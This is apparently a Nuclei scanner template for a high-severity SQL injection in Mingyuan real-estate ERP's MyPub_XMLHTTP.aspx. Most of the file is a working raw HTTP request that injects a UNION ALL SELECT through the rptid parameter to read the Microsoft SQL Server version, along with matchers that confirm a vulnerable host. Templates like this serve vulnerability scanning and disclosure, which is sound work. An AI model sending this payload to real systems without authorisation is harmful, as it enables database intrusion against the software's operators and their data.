id: mingyuanERP-MyPub_XMLHTTP-sql

info:
  name: 明源地产ERP MyPub_XMLHTTP.aspx 存在SQL注入漏洞
  author: mingyuanERP
  severity: high
  tags: mingyuanERP

http:
  - raw:
      - |+
        GET /Sldzkp/DZKP/MyPub_XMLHTTP.aspx/?ywtype=GETPRINTVAL&rptid=1%27+UNION+ALL+SELECT+NULL%2C%40%40version%2CNULL%2CNULL-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Microsoft SQL Server'
          - '<X64>'
        condition: and
      - type: status
        status:
          - 200
